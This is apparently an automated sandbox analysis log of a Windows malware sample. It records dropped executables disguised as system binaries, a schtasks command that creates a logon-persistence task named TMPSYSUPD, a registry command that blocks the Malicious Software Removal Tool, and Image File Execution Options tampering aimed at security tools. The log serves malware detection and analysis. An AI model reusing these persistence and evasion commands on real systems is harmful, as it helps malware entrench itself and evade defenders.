Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /fJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: perfos.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: powrprof.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: pdh.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: umpdc.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: amsi.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: userenv.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeSection loaded: perfos.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic file information: File size 30441984 > 1048576
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1cad000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: section name: .voltbl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: section name: _RDATA
Source: SppExtComObj.exe.5.drStatic PE information: section name: .voltbl
Source: SppExtComObj.exe.5.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848E7D2A5 pushad ; iretd 12_2_00007FF848E7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F9380D pushad ; iretd 12_2_00007FF848F93811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F9846B push ebx; ret 12_2_00007FF848F9856A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F9248D push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F900BD pushad ; iretd 12_2_00007FF848F900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F924ED push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeFile created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exeJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytesJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytesJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
